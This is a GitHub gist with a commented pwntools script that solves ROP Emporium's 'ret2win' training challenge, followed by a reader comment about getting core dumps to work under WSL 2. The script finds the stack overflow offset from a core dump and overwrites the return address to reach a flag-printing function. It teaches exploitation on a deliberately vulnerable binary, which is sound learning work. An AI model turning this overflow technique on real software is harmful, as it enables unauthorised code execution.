Created
September 1, 2017 20:35
-
-
Save zachriggle/e4d591db7ceaafbe8ea32b461e239320 to your computer and use it in GitHub Desktop.
Example Exploit for ROP Emporium's ret2win Challenge Raw
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# Set up pwntools to work with this binary | |
elf = context.binary = ELF('ret2win') | |
# Enable verbose logging so we can see exactly what is being sent. | |
context.log_level = 'debug' | |
# Print out the target address | |
info("%#x target", elf.symbols.ret2win) | |
# Figure out how big of an overflow we need by crashing the | |
# process once. | |
io = process(elf.path) | |
# We will send a 'cyclic' pattern which overwrites the return | |
# address on the stack. The value 128 is longer than the buffer. | |
io.sendline(cyclic(128)) | |
# Wait for the process to crash | |
io.wait() | |
# Open up the corefile | |
core = io.corefile | |
# Print out the address of RSP at the time of crashing | |
stack = core.rsp | |
info("%#x stack", stack) | |
# Read four bytes from RSP, which will be some of our cyclic data. | |
# | |
# With this snippet of the pattern, we know the exact offset from | |
# the beginning of our controlled data to the return address. | |
pattern = core.read(stack, 4) | |
info("%r pattern", pattern) | |
# Craft a new payload which puts the "target" address at the correct offset | |
payload = fit({ | |
pattern: elf.symbols.ret2win | |
}) | |
# Send the payload to a new copy of the process | |
io = process(elf.path) | |
io.sendline(payload) | |
io.recvuntil("Here's your flag:") | |
# Get our flag! | |
flag = io.recvline() | |
success(flag) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Although my issue was kind of different your comment gave me a better perspective.
Problem
I got stuck trying to find the reason for not having a
/proc/sys/kernel/core_pattern
available. As I was running through the Windows Subsystem for Linux (Ubuntu 20.04) I had a feeling the VM instance was not writing the core dumps properly.The first issue was that I got empty output from
dmesg -t
(I kind of ignored that part). And then when I tried using the Python script above I gotNo such file or directory
from:Solution
A bit of background here:
The solution was to run my Windows Subsystem for Linux as WSL 2 instead of 1 and then restart my WSL instance:
I put the following into PowerShell based on the link above:
And now
core_pattern
was available in the Ubuntu shell:And I could get output from
dmesg -t
: